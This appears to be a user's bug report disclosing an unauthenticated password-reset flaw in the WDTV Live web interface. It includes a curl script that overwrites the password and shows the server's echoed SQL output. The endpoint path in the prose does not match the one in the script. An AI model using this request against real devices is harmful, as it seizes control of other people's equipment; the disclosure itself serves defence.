It is possible to set a new password for the web interface without further authentication. (One does not have to know the old web interface password to set a new password.)
A HTTP POST request to /DB/modfiy_pwd.php on WDTV Live will overwrite the web interface’s password.
Example request using curl:
#!/bin/sh
#IP of WDTV Live:
WDTVLIVE=1.2.3.4
curl -d "password=bla" http://${WDTVLIVE}/DB/modfiy_pw.php
Output:
blaUPDATE web_password SET user_password_pw="bla" where user_id="1"1
Now you can login to the web interface using password ‘bla’.
Firmware: 1.09.10 and lower
What hardware and media were you using? WDTV Live SMP (european)
Does it happen every time? sure.
Does it happen with previous firmware? yes.
Does power cycling the unit solve it? of course not.
Does resetting to factory defaults solve it? of course not.
Have you tried this on other devices? WDTVLive Hub